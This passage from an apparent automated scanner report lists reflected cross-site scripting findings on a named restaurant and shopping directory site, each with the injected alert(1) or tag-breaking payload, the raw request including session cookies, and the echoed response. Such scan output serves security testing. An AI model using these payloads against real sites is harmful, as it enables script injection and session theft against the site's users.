The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90987'-alert(1)-'f376bd7dc13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Health-and-Diet-Shops90987'-alert(1)-'f376bd7dc13/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:59:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Health-and-Diet-Shops90987'-alert(1)-'f376bd7dc13';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.712. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bb78"><a>b553ecdde1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants9bb78"><a>b553ecdde1b/Ice-Cream-and-Sweets/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:53:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants9bb78"><a>b553ecdde1b">
...[SNIP]...

4.713. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc6d6'-alert(1)-'b85be5bc31d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurantsbc6d6'-alert(1)-'b85be5bc31d/Ice-Cream-and-Sweets/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:01:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurantsbc6d6'-alert(1)-'b85be5bc31d/Ice-Cream-and-Sweets';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.714. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44d05'-alert(1)-'e5bf22974c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Ice-Cream-and-Sweets44d05'-alert(1)-'e5bf22974c0/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:06:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Ice-Cream-and-Sweets44d05'-alert(1)-'e5bf22974c0';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.715. http://www.beirut.com/Restaurants/Juice-Stalls/528624339 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Juice-Stalls/528624339

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf1a"><a>aa61017ead2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurantsabf1a"><a>aa61017ead2/Juice-Stalls/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:47:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurantsabf1a"><a>aa61017ead2">
...[SNIP]...

4.716. http://www.beirut.com/Restaurants/Juice-Stalls/528624339 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Juice-Stalls/528624339

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c79f0'-alert(1)-'4eefd7ec071 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurantsc79f0'-alert(1)-'4eefd7ec071/Juice-Stalls/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:00:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurantsc79f0'-alert(1)-'4eefd7ec071/Juice-Stalls';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.717. http://www.beirut.com/Restaurants/Juice-Stalls/528624339 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Juice-Stalls/528624339

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19117'-alert(1)-'d1c1a51eafe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Juice-Stalls19117'-alert(1)-'d1c1a51eafe/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:04:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants/Juice-Stalls19117'-alert(1)-'d1c1a51eafe';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.718. http://www.beirut.com/Restaurants/Take-Away/646084613 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Take-Away/646084613

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 841f9"><a>21d75454e93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants841f9"><a>21d75454e93/Take-Away/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:44:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants841f9"><a>21d75454e93">
...[SNIP]...

4.719. http://www.beirut.com/Restaurants/Take-Away/646084613 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Take-Away/646084613

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29b3d'-alert(1)-'6978ed6be48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants29b3d'-alert(1)-'6978ed6be48/Take-Away/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:52:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Restaurants29b3d'-alert(1)-'6978ed6be48/Take-Away';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.720. http://www.beirut.com/Restaurants/Take-Away/646084613 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Take-Away/646084613

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 732c1'-alert(1)-'459e64ce0f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Take-Away732c1'-alert(1)-'459e64ce0f5/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:58:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Take-Away732c1'-alert(1)-'459e64ce0f5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.721. http://www.beirut.com/Restaurants/Winery/0312375197 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Winery/0312375197

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a14'-alert(1)-'7bc71a9c1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants20a14'-alert(1)-'7bc71a9c1b/Winery/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:42:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants20a14'-alert(1)-'7bc71a9c1b/Winery';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.722. http://www.beirut.com/Restaurants/Winery/0312375197 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Winery/0312375197

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e9aa"><a>183d4f3f7ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants7e9aa"><a>183d4f3f7ae/Winery/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:36:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants7e9aa"><a>183d4f3f7ae">
...[SNIP]...

4.723. http://www.beirut.com/Restaurants/Winery/0312375197 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Winery/0312375197

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6d85'-alert(1)-'e0df76b5580 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Winerye6d85'-alert(1)-'e0df76b5580/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:47:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurants/Winerye6d85'-alert(1)-'e0df76b5580';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.724. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30952'-alert(1)-'556232b32e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping30952'-alert(1)-'556232b32e7/Books-Music-Movies/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:53:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
